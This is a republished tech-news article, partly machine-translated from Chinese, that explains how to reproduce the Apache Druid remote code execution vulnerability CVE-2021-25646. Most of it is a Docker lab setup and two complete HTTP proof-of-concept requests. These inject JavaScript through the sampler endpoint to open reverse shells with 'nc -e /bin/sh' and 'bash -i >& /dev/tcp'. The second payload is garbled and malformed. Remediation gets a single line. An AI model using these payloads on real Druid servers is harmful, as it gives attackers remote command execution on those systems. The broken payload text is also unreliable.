In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-31 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
How to reproduce the Apache Druid remote code execution vulnerability CVE-2021-25646? aiming at this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.
1. Summary of vulnerabilities
Apache Druid is a column-oriented open source distributed data store written in Java, which is designed to quickly obtain large amounts of event data and provide low-latency queries on top of the data.
Apache Druid lacks authorization authentication by default, and an attacker can send a specially crafted request to execute arbitrary code using the privileges of the process on the Druid server.
II. Scope of influence
Affected version: Apache Druid
< 0.20.1 安全版本: Apache Druid 0.20.1 三、环境搭建 https://github.com/apache/druid/ https://druid.apache.org/docs/latest/tutorials/index.html 下载0.19版本 https://github.com/apache/druid/releases/tag/druid-0.19.0 解压 cd druid-druid-0.19.0-rc1\distribution\docker docker-compose up -d 打开 http://192.168.123.10:8888 四、漏洞复现 Poc1:通用 POST /druid/indexer/v1/sampler HTTP/1.1Host: 192.168.123.10:8888Accept: application/json, text/plain, */*DNT: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36Referer: http://192.168.123.10:8888/unified-console.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: application/jsonConnection: closeContent-Length: 1007{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.123.10 5555 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}} 注意:因为是docker环境没有bash,这里直接采用nc -e反弹 Poc2:通用 POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1Host: 0.0.0.0:8888Content-Length: 1005Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36DNT: 1Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript", "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& / dev/tcp/0.0.0.0/5555 0 > & 1')} "," dimension ":" added " "": {"enabled": "true"}, "type": "index" "tuningConfig": {"type": "index"}, "samplerConfig": {"numRows": 50, "timeoutMs": 10000}}
V. suggestions for restoration
Upgrade to the secure version or above.
This is the answer to the question about how to reproduce the Apache Druid remote code execution vulnerability CVE-2021-25646. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.